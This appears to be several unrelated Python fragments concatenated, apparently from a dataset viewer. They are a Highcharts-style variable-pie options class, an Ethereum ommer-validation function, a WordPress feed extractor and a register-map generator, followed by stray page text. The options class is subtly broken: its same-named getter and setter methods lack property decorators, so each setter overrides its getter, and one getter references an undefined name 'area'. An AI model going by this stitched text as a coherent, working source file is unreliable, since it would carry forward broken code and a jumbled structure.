    def onPoint(self) -> 'OptionSeriesVariablepieOnpoint':
        return self._config_sub_data('onPoint', OptionSeriesVariablepieOnpoint)
    def opacity(self):
        return self._config_get(1)
    def opacity(self, num: float):
        self._config(num, js_type=False)
    def point(self) -> 'OptionSeriesVariablepiePoint':
        return self._config_sub_data('point', OptionSeriesVariablepiePoint)
    def pointDescriptionFormat(self):
        return self._config_get(None)
    def pointDescriptionFormat(self, value: Any):
        self._config(value, js_type=False)
    def pointDescriptionFormatter(self):
        return self._config_get(None)
    def pointDescriptionFormatter(self, value: Any):
        self._config(value, js_type=False)
    def pointInterval(self):
        return self._config_get(1)
    def pointInterval(self, num: float):
        self._config(num, js_type=False)
    def pointIntervalUnit(self):
        return self._config_get(None)
    def pointIntervalUnit(self, value: Any):
        self._config(value, js_type=False)
    def pointPlacement(self):
        return self._config_get(None)
    def pointPlacement(self, text: str):
        self._config(text, js_type=False)
    def pointStart(self):
        return self._config_get(0)
    def pointStart(self, num: float):
        self._config(num, js_type=False)
    def relativeXValue(self):
        return self._config_get(False)
    def relativeXValue(self, flag: bool):
        self._config(flag, js_type=False)
    def selected(self):
        return self._config_get(False)
    def selected(self, flag: bool):
        self._config(flag, js_type=False)
    def shadow(self):
        return self._config_get(False)
    def shadow(self, flag: bool):
        self._config(flag, js_type=False)
    def showCheckbox(self):
        return self._config_get(False)
    def showCheckbox(self, flag: bool):
        self._config(flag, js_type=False)
    def showInLegend(self):
        return self._config_get(False)
    def showInLegend(self, flag: bool):
        self._config(flag, js_type=False)
    def size(self):
        return self._config_get(None)
    def size(self, num: float):
        self._config(num, js_type=False)
    def sizeBy(self):
        # NOTE(review): `area` is undefined (likely meant the string
        # 'area') -- unreachable due to shadowing by the setter below.
        return self._config_get(area)
    def sizeBy(self, value: Any):
        self._config(value, js_type=False)
    def skipKeyboardNavigation(self):
        return self._config_get(None)
    def skipKeyboardNavigation(self, flag: bool):
        self._config(flag, js_type=False)
    def slicedOffset(self):
        return self._config_get(10)
    def slicedOffset(self, num: float):
        self._config(num, js_type=False)
    def softThreshold(self):
        return self._config_get(True)
    def softThreshold(self, flag: bool):
        self._config(flag, js_type=False)
    def sonification(self) -> 'OptionSeriesVariablepieSonification':
        return self._config_sub_data('sonification', OptionSeriesVariablepieSonification)
    def stacking(self):
        return self._config_get(None)
    def stacking(self, text: str):
        self._config(text, js_type=False)
    def startAngle(self):
        return self._config_get(0)
    def startAngle(self, num: float):
        self._config(num, js_type=False)
    def states(self) -> 'OptionSeriesVariablepieStates':
        return self._config_sub_data('states', OptionSeriesVariablepieStates)
    def step(self):
        return self._config_get(None)
    def step(self, value: Any):
        self._config(value, js_type=False)
    def stickyTracking(self):
        return self._config_get(False)
    def stickyTracking(self, flag: bool):
        self._config(flag, js_type=False)
    def thickness(self):
        return self._config_get('undefined')
    def thickness(self, num: float):
        self._config(num, js_type=False)
    def threshold(self):
        return self._config_get(0)
    def threshold(self, num: float):
        self._config(num, js_type=False)
    def tooltip(self) -> 'OptionSeriesVariablepieTooltip':
        return self._config_sub_data('tooltip', OptionSeriesVariablepieTooltip)
    def turboThreshold(self):
        return self._config_get(1000)
    def turboThreshold(self, num: float):
        self._config(num, js_type=False)
    def type(self):
        return self._config_get(None)
    def type(self, text: str):
        self._config(text, js_type=False)
    def visible(self):
        return self._config_get(True)
    def visible(self, flag: bool):
        self._config(flag, js_type=False)
    def zIndex(self):
        return self._config_get(None)
    def zIndex(self, num: float):
        self._config(num, js_type=False)
    def zMax(self):
        return self._config_get('undefined')
    def zMax(self, num: float):
        self._config(num, js_type=False)
    def zMin(self):
        return self._config_get('undefined')
    def zMin(self, num: float):
        self._config(num, js_type=False)
    def zoneAxis(self):
        return self._config_get('y')
    def zoneAxis(self, text: str):
        self._config(text, js_type=False)
    def zones(self) -> 'OptionSeriesVariablepieZones':
        return self._config_sub_data('zones', OptionSeriesVariablepieZones)
def validate_ommers(ommers: Tuple[(Header, ...)], block_header: Header, chain: BlockChain) -> None:
    """Validate the ommer (uncle) headers included in a block.

    Checks the ommers-hash commitment, each ommer's own header validity,
    the two-ommer limit, uniqueness, depth bounds, canonicality, and the
    requirement that an ommer branch off a recent canonical block.
    All failures raise InvalidBlock via `ensure`.
    """
    block_hash = rlp.rlp_hash(block_header)
    # The header must commit to exactly this list of ommers.
    ensure((rlp.rlp_hash(ommers) == block_header.ommers_hash), InvalidBlock)
    if (len(ommers) == 0):
        # Nothing further to validate for an empty ommer list.
        return
    for ommer in ommers:
        # An ommer must be strictly older than this block and not genesis.
        ensure((1 <= ommer.number < block_header.number), InvalidBlock)
        # Fetch the ommer's parent from the canonical chain; negative
        # indexing counts back from the current head.
        ommer_parent_header = chain.blocks[((- (block_header.number - ommer.number)) - 1)].header
        validate_header(ommer, ommer_parent_header)
    # At most two ommers per block, and no duplicates among them.
    ensure((len(ommers) <= 2), InvalidBlock)
    ommers_hashes = [rlp.rlp_hash(ommer) for ommer in ommers]
    ensure((len(ommers_hashes) == len(set(ommers_hashes))), InvalidBlock)
    # Collect hashes of recent canonical blocks and of every ommer those
    # blocks already included, to reject re-inclusion.
    recent_canonical_blocks = chain.blocks[(- (MAX_OMMER_DEPTH + 1)):]
    recent_canonical_block_hashes = {rlp.rlp_hash(block.header) for block in recent_canonical_blocks}
    recent_ommers_hashes: Set[Hash32] = set()
    for block in recent_canonical_blocks:
        recent_ommers_hashes = recent_ommers_hashes.union({rlp.rlp_hash(ommer) for ommer in block.ommers})
    for (ommer_index, ommer) in enumerate(ommers):
        ommer_hash = ommers_hashes[ommer_index]
        # An ommer may not be the block itself, a canonical block, or an
        # ommer already included by a recent block.
        ensure((ommer_hash != block_hash), InvalidBlock)
        ensure((ommer_hash not in recent_canonical_block_hashes), InvalidBlock)
        ensure((ommer_hash not in recent_ommers_hashes), InvalidBlock)
        # Depth limit: between 1 and MAX_OMMER_DEPTH generations back.
        ommer_age = (block_header.number - ommer.number)
        ensure((1 <= ommer_age <= MAX_OMMER_DEPTH), InvalidBlock)
        # The ommer must branch off a recent canonical block, and must
        # not share this block's own parent.
        ensure((ommer.parent_hash in recent_canonical_block_hashes), InvalidBlock)
        ensure((ommer.parent_hash != block_header.parent_hash), InvalidBlock)
def extractCheldraWordpressCom(item):
    """Map a 'Cheldra' WordPress feed item to a release message.

    Returns None for previews or items with no chapter/volume info,
    False when no known tag matches, and the built release otherwise.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if ('preview' in item['title'].lower()) or not (chp or vol):
        return None
    # Known feed tags mapped to (series name, translation type).
    releases = {
        'PRC': ('PRC', 'translated'),
        'Loiterous': ('Loiterous', 'oel'),
    }
    for tagname, (name, tl_type) in releases.items():
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class Python(Generator, Jinja2):
    """Register-map generator that renders a Python module from a template."""

    def __init__(self, rmap=None, path='regs.py', **args):
        super().__init__(rmap, **args)
        # Destination path of the rendered Python file.
        self.path = path

    def generate(self):
        """Validate the register map and render it to ``self.path``."""
        self.validate()
        # Template context: tool version, register map, global config.
        context = {
            'corsair_ver': __version__,
            'rmap': self.rmap,
            'config': config.globcfg,
        }
        self.render_to_file('regmap_py.j2', context, self.path)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.